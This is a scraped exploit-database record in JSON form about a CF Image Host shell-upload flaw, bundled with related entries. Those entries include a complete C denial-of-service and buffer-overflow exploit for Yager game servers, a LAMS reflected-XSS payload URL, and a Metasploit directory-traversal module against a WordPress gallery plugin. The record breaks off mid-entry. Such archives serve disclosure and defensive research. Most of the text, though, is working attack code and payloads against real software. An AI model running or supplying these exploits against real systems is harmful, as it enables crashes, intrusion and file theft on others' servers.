ID 1337DAY-ID-12090
Type zdt
Reporter The.Morpheus
Modified 2010-05-01T00:00:00
Description
Exploit for php platform in category web applications
======================================================
CF Image Host v1.1 Remote File Inclusion Vulnerability
======================================================
###########################################################
Download: http://codefuture.co.uk/counter/?id=22
Title : CF Image Host Remote File Inclusion Vulnerability
Author: The.Morpheus
Contact: -
Thank`s: Herkese :)
Greetz: Megaturks.Net | Spyturks.Com
demo :http://codefuture.co.uk/projects/imagehost1.1/demo/
========================================================================
Description:
Xploit : Upload Vulnerability
Step 1:Shell Jpg,Gif
Step 2 : upload
Demo : http://server/upload.php
# 0day.today [2018-04-01] #
{"published": "2010-05-01T00:00:00", "id": "1337DAY-ID-12090", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:40:27", "bulletin": {"published": "2010-05-01T00:00:00", "id": "1337DAY-ID-12090", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-19T23:40:27", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/"}}, "hash": "76948fffcf411b2d64eb5ec8523a6d20ca32f4515b9b68bf4167be96623b204a", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:40:27", "edition": 1, "title": "CF Image Host v1.1 Remote File Inclusion Vulnerability", "href": "http://0day.today/exploit/description/12090", "modified": "2010-05-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12090", "references": [], "reporter": "The.Morpheus", "sourceData": "======================================================\r\nCF Image Host v1.1 Remote File Inclusion Vulnerability\r\n======================================================\r\n\r\n###########################################################\r\n \r\nDownload: http://codefuture.co.uk/counter/?id=22\r\nTitle : CF Image Host Remote File Inclusion Vulnerability\r\nAuthor: The.Morpheus\r\nContact: -\r\nThank`s: Herkese :)\r\nGreetz: Megaturks.Net | Spyturks.Com\r\ndemo :http://codefuture.co.uk/projects/imagehost1.1/demo/\r\n========================================================================\r\n \r\nDescription:\r\n \r\nXploit : Upload Vulnerability\r\n \r\n \r\n Step 1:Shell Jpg,Gif\r\n Step 2 : upload\r\n \r\nDemo : http://server/upload.php\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "71ac6e86f40f89c956270bf37a795168", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "68e7666514e22ec61e1bcb16e1cad88c", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "77be1a8414b683c4d264a4cdf734437b", "key": "published"}, {"hash": "f4952ffff32bd1e3eb175a04191bfd2d", "key": "title"}, {"hash": "d9b810b120f8e417a73417d60a38cea9", "key": "reporter"}, {"hash": "d151cb6771f804c903c8ed7c7d7479cb", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "77be1a8414b683c4d264a4cdf734437b", "key": "modified"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "44b98c2ca32a8f25f5e22b22813752e66d5ee1663faa5f3258a899a161bfb32c", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-01T21:35:38"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-30843"]}, {"type": "exploitdb", "idList": ["EDB-ID:45153"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148833"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5976", "SECURITYVULNS:DOC:12090"]}], "modified": "2018-04-01T21:35:38"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-01T21:35:38", "edition": 2, "title": "CF Image Host v1.1 Remote File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/12090", "modified": "2010-05-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/12090", "references": [], "reporter": "The.Morpheus", "sourceData": "======================================================\r\nCF Image Host v1.1 Remote File Inclusion Vulnerability\r\n======================================================\r\n\r\n###########################################################\r\n \r\nDownload: http://codefuture.co.uk/counter/?id=22\r\nTitle : CF Image Host Remote File Inclusion Vulnerability\r\nAuthor: The.Morpheus\r\nContact: -\r\nThank`s: Herkese :)\r\nGreetz: Megaturks.Net | Spyturks.Com\r\ndemo :http://codefuture.co.uk/projects/imagehost1.1/demo/\r\n========================================================================\r\n \r\nDescription:\r\n \r\nXploit : Upload Vulnerability\r\n \r\n \r\n Step 1:Shell Jpg,Gif\r\n Step 2 : upload\r\n \r\nDemo : http://server/upload.php\r\n\r\n\n\n# 0day.today [2018-04-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "5c29a923604922f6d46084a0a50e2de5", "key": "href"}, {"hash": "77be1a8414b683c4d264a4cdf734437b", "key": "modified"}, {"hash": "77be1a8414b683c4d264a4cdf734437b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d9b810b120f8e417a73417d60a38cea9", "key": "reporter"}, {"hash": "4bbf18b8abdc4f821b016d49729d4ae7", "key": "sourceData"}, {"hash": "c086eed41347d5f2df65afb4e4aca37f", "key": "sourceHref"}, {"hash": "f4952ffff32bd1e3eb175a04191bfd2d", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-08-06T16:22:46", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2018-08-06T00:00:00", "published": "2018-08-06T00:00:00", "id": "1337DAY-ID-30843", "href": "https://0day.today/exploit/description/30843", "title": "LAMS < 3.1 - Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: LAMS < 3.1 - Cross-Site Scripting\r\n# Exploit Author: Nikola Kojic\r\n# Website: https://ras-it.rs/\r\n# Vendor Homepage: https://www.lamsfoundation.org/\r\n# Software Link: https://www.lamsfoundation.org/downloads_home.htm\r\n# Category: Web Application\r\n# Platform: Java\r\n# Version: <= 3.1\r\n# CVE: 2018-12090\r\n \r\n# Vendor Description:\r\n# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative \r\n# learning activities. It provides teachers with a highly intuitive visual authoring \r\n# environment for creating sequences of learning activities.\r\n \r\n# Technical Details and Exploitation:\r\n# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows \r\n# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET\r\n# parameter during a forgotPasswordChange.jsp?key= password change.\r\n \r\n# Proof of Concept:\r\nhttp://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E\r\n \r\n# Timeline:\r\n# 2018-06-07: Discovered\r\n# 2018-06-08: Vendor notified\r\n# 2018-06-08: Vendor replies\r\n# 2018-06-11: CVE number requested\r\n# 2018-06-11: CVE number assigned\r\n# 2018-06-15: Patch released\r\n# 2018-08-05: Public disclosure\n\n# 0day.today [2018-08-06] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30843"}, {"lastseen": "2018-04-12T03:51:02", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2005-04-14T00:00:00", "published": "2005-04-14T00:00:00", "id": "1337DAY-ID-5976", "href": "https://0day.today/exploit/description/5976", "type": "zdt", "title": "Yager <= 5.24 Multiple Denial of Service Exploit", "sourceData": "================================================\r\nYager <= 5.24 Multiple Denial of Service Exploit\r\n================================================\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ (HEADSZ + 65536)\r\n#define PORT 34855\r\n#define TIMEOUT 3\r\n#define HEADSZ 10\r\n#define EIP \"\\xde\\xc0\\xad\\xde\"\r\n#define CRASHSZ 100\r\n#define NICKBOF \"\\x00\\x00\\x00\\x00\" /* vehicle type */ \\\r\n \"\\x01\\x00\\x00\\x00\" /* team */ \\\r\n \"\\xff\\xff\\xff\\xff\" /* nickname size, ignored! */ \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n EIP \\\r\n \"aaaaaaaaaaaaaaaa\\0\"\r\n#define PCKBOF \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aa\" EIP\r\n\r\n#define SHOW(x) printf(x \"%n%s%n\\n\", &tmp, p, &len); \\\r\n p += (len - tmp) + 1;\r\n#define SENDTO(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) \\\r\n < 0) std_err();\r\n#define RECVFROM if(timeout(sd) < 0) { \\\r\n fputs(\"\\nError: socket timeout, no reply received\\n\\n\", stdout); \\\r\n exit(1); \\\r\n } \\\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \\\r\n if(len < 0) std_err();\r\n#define SEND(x,y) if(send(sd, x, y, 0) \\\r\n < 0) std_err();\r\n\r\n\r\n\r\nu_long resolv(char *host);\r\nint timeout(int sock);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n len,\r\n attack,\r\n tmp,\r\n autoport = 1;\r\n u_short port = PORT;\r\n u_char *buff,\r\n info[] =\r\n \"Y_NET_YAGER_CLIENT\\0\"\r\n \"\\x00\\x00\" \"\\x00\\x00\",\r\n *p;\r\n struct yager_head {\r\n u_long type;\r\n u_short size;\r\n u_short pck1;\r\n u_short pck2;\r\n } *yh;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Yager <= 5.24 multiple vulnerabilities \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <attack> <host> [port(auto)]\\n\"\r\n \"\\n\"\r\n \"Attacks:\\n\"\r\n \" 1 = nickname buffer-overflow\\n\"\r\n \" 2 = big data buffer-overflow\\n\"\r\n \" 3 = freeze of server and connected clients\\n\"\r\n \" 4 = crash using type 0x1d (in 0x0050e970)\\n\"\r\n \" 5 = crash using type 0x22 (in 0x004fd2b8)\\n\"\r\n \" 6 = crash using type 0x24 (in 0x004fd2f5)\\n\"\r\n \" 7 = crash using type 0x28 (in 0x004b0f1b)\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n if(argc > 3) {\r\n autoport = 0;\r\n port = atoi(argv[3]);\r\n }\r\n\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n if(autoport) {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n fputs(\"- request informations:\\n\", stdout);\r\n *(u_short *)(info + 19) = ~time(NULL);\r\n SENDTO(info);\r\n RECVFROM;\r\n close(sd);\r\n\r\n p = buff + 19;\r\n port = ntohs(*(u_short *)p);\r\n printf(\"\\n Server port %d\\n\", port);\r\n p += 2;\r\n SHOW(\" Map \");\r\n printf(\" Version %d.%d\\n\", p[1], p[0]);\r\n p += 2;\r\n SHOW(\" Server name \");\r\n p += 4;\r\n printf(\" Players %d / %d\\n\\n\", p[1], p[0]);\r\n\r\n peer.sin_port = htons(port);\r\n }\r\n\r\n attack = atoi(argv[1]);\r\n if(attack > 7) {\r\n fputs(\"\\nError: you have chosen a wrong attack number\\n\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n yh = (struct yager_head *)buff;\r\n yh->pck1 = tmp = ~time(NULL) & 0xffff;\r\n yh->pck2 = 0;\r\n\r\n if(attack == 1) {\r\n yh->type = 0x1e;\r\n memcpy(buff + HEADSZ, NICKBOF, sizeof(NICKBOF) - 1);\r\n yh->size = sizeof(NICKBOF) - 1;\r\n fputs(\"- send long data block for nickname buffer-overflow\\n\", stdout);\r\n\r\n } else if(attack == 2) {\r\n yh->type = 0x00; // almost any other type is ok\r\n memcpy(buff + HEADSZ, PCKBOF, sizeof(PCKBOF) - 1);\r\n yh->size = sizeof(PCKBOF) - 1;\r\n fputs(\"- send long data block for packet buffer-overflow\\n\", stdout);\r\n\r\n } else if(attack == 3) {\r\n yh->type = 0x1b;\r\n yh->size = 0;\r\n printf(\"- server waits for %d bytes but we send a partial header\\n\", HEADSZ);\r\n tmp %= HEADSZ;\r\n if(tmp <= 0) tmp = 1;\r\n SEND(buff, tmp);\r\n fputs(\" Server and connected clients should be freezed, press RETURN to stop the attack\\n\", stdout);\r\n fgetc(stdin);\r\n close(sd);\r\n return(0);\r\n\r\n } else {\r\n if(attack == 4) {\r\n yh->type = 0x1d;\r\n } else if(attack == 5) {\r\n yh->type = 0x22;\r\n } else if(attack == 6) {\r\n yh->type = 0x24;\r\n } else if(attack == 7) {\r\n yh->type = 0x28;\r\n }\r\n\r\n memset(buff + HEADSZ, 0xff, CRASHSZ);\r\n yh->size = CRASHSZ;\r\n printf(\"- send crash data with type 0x%08lx\\n\", yh->type);\r\n }\r\n\r\n SEND(buff, yh->size + HEADSZ);\r\n fputs(\"- check server status\\n\", stdout);\r\n if(!timeout(sd)) {\r\n if(recv(sd, buff, BUFFSZ, 0) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\r\n }\r\n } else {\r\n fputs(\"\\nNo reply from the server, it is probably not vulnerable\\n\\n\", stdout);\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5976"}], "exploitdb": [{"lastseen": "2018-08-06T13:31:13", "bulletinFamily": "exploit", "description": "LAMS < 3.1 - Cross-Site Scripting. CVE-2018-12090. Webapps exploit for Java platform", "modified": "2018-08-06T00:00:00", "published": "2018-08-06T00:00:00", "id": "EDB-ID:45153", "href": "https://www.exploit-db.com/exploits/45153/", "type": "exploitdb", "title": "LAMS < 3.1 - Cross-Site Scripting", "sourceData": "# Exploit Title: LAMS < 3.1 - Cross-Site Scripting\r\n# Date: 2018-08-05\r\n# Exploit Author: Nikola Kojic\r\n# Website: https://ras-it.rs/\r\n# Vendor Homepage: https://www.lamsfoundation.org/\r\n# Software Link: https://www.lamsfoundation.org/downloads_home.htm\r\n# Category: Web Application\r\n# Platform: Java\r\n# Version: <= 3.1\r\n# CVE: 2018-12090\r\n\r\n# Vendor Description:\r\n# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative \r\n# learning activities. It provides teachers with a highly intuitive visual authoring \r\n# environment for creating sequences of learning activities.\r\n\r\n# Technical Details and Exploitation:\r\n# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows \r\n# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET\r\n# parameter during a forgotPasswordChange.jsp?key= password change.\r\n\r\n# Proof of Concept:\r\nhttp://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E\r\n\r\n# Timeline:\r\n# 2018-06-07: Discovered\r\n# 2018-06-08: Vendor notified\r\n# 2018-06-08: Vendor replies\r\n# 2018-06-11: CVE number requested\r\n# 2018-06-11: CVE number assigned\r\n# 2018-06-15: Patch released\r\n# 2018-08-05: Public disclosure", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45153/"}], "packetstorm": [{"lastseen": "2018-08-08T01:54:56", "bulletinFamily": "exploit", "description": "", "modified": "2018-08-06T00:00:00", "published": "2018-08-06T00:00:00", "id": "PACKETSTORM:148833", "href": "https://packetstormsecurity.com/files/148833/LAMS-Cross-Site-Scripting.html", "title": "LAMS Cross Site Scripting", "type": "packetstorm", "sourceData": "`# Exploit Title: LAMS < 3.1 - Cross-Site Scripting \n# Date: 2018-08-05 \n# Exploit Author: Nikola Kojic \n# Website: https://ras-it.rs/ \n# Vendor Homepage: https://www.lamsfoundation.org/ \n# Software Link: https://www.lamsfoundation.org/downloads_home.htm \n# Category: Web Application \n# Platform: Java \n# Version: <= 3.1 \n# CVE: 2018-12090 \n \n# Vendor Description: \n# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative \n# learning activities. It provides teachers with a highly intuitive visual authoring \n# environment for creating sequences of learning activities. \n \n# Technical Details and Exploitation: \n# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows \n# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET \n# parameter during a forgotPasswordChange.jsp?key= password change. \n \n# Proof of Concept: \nhttp://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E \n \n# Timeline: \n# 2018-06-07: Discovered \n# 2018-06-08: Vendor notified \n# 2018-06-08: Vendor replies \n# 2018-06-11: CVE number requested \n# 2018-06-11: CVE number assigned \n# 2018-06-15: Patch released \n# 2018-08-05: Public disclosure \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148833/lams-xss.txt"}], "cve": [{"lastseen": "2019-09-12T16:48:47", "bulletinFamily": "NVD", "description": "There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.", "modified": "2019-03-08T14:23:00", "id": "CVE-2018-12090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12090", "published": "2018-06-11T10:29:00", "title": "CVE-2018-12090", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "metasploit": [{"lastseen": "2019-12-09T08:59:58", "bulletinFamily": "exploit", "description": "This module exploits an authenticated directory traversal vulnerability in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing to read arbitrary directories with the web server privileges.\n", "modified": "2017-07-24T13:26:21", "published": "2015-09-01T16:28:04", "id": "MSF:AUXILIARY/SCANNER/HTTP/WP_NEXTGEN_GALLEY_FILE_READ", "href": "", "type": "metasploit", "title": "WordPress NextGEN Gallery Directory Read Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'json'\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress NextGEN Gallery Directory Read Vulnerability',\n 'Description' => %q{\n This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing\n to read arbitrary directories with the web server privileges.\n },\n 'References' =>\n [\n ['WPVDB', '8165'],\n ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']\n ],\n 'Author' =>\n [\n 'Sathish Kumar', # Vulnerability Discovery\n 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('WP_USER', [true, 'A valid username', nil]),\n OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),\n OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])\n ])\n end\n\n def user\n datastore['WP_USER']\n end\n\n def password\n datastore['WP_PASS']\n end\n\n def check\n check_plugin_version_from_readme('nextgen-gallery', '2.1.9')\n end\n\n def get_nonce(cookie)\n res = send_request_cgi(\n 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'page' => 'ngg_addgallery'\n },\n 'cookie' => cookie\n )\n\n if res && res.redirect? && res.redirection\n location = res.redirection\n print_status(\"Following redirect to #{location}\")\n res = send_request_cgi(\n 'uri' => location,\n 'method' => 'GET',\n 'cookie' => cookie\n )\n end\n\n res.body.scan(/var browse_params = {\"nextgen_upload_image_sec\":\"(.+)\"};/).flatten.first\n end\n\n def parse_paths(res)\n begin\n j = JSON.parse(res.body)\n rescue JSON::ParserError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n return []\n end\n\n html = j['html']\n noko = Nokogiri::HTML(html)\n links = noko.search('a')\n links.collect { |e| normalize_uri(\"#{datastore['DIRPATH']}/#{e.text}\") }\n end\n\n def run_host(ip)\n vprint_status(\"Trying to login as: #{user}\")\n cookie = wordpress_login(user, password)\n if cookie.nil?\n print_error(\"Unable to login as: #{user}\")\n return\n end\n store_valid_credential(user: user, private: password, proof: cookie)\n\n vprint_status(\"Trying to get nonce...\")\n nonce = get_nonce(cookie)\n if nonce.nil?\n print_error(\"Can not get nonce after login\")\n return\n end\n vprint_status(\"Got nonce: #{nonce}\")\n\n traversal = \"../\" * datastore['DEPTH']\n filename = datastore['DIRPATH']\n filename = filename[1, filename.length] if filename =~ /^\\//\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'headers' => {\n 'Referer' => \"http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery\",\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'vars_get' => {\n 'photocrati_ajax' => '1'\n },\n 'vars_post' => {\n 'nextgen_upload_image_sec' => \"#{nonce}\",\n 'action' => 'browse_folder',\n 'dir' => \"#{traversal}#{filename}\"\n },\n 'cookie' => cookie\n )\n\n if res && res.code == 200\n\n paths = parse_paths(res)\n vprint_line(paths * \"\\n\")\n\n fname = datastore['DIRPATH']\n path = store_loot(\n 'nextgen.traversal',\n 'text/plain',\n ip,\n paths * \"\\n\",\n fname\n )\n\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Nothing was downloaded. You can try to change the DIRPATH.\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb"}, {"lastseen": "2019-11-24T21:38:33", "bulletinFamily": "exploit", "description": "This module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the FileDownloadServlet from the SOM component, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-23T16:24:29", 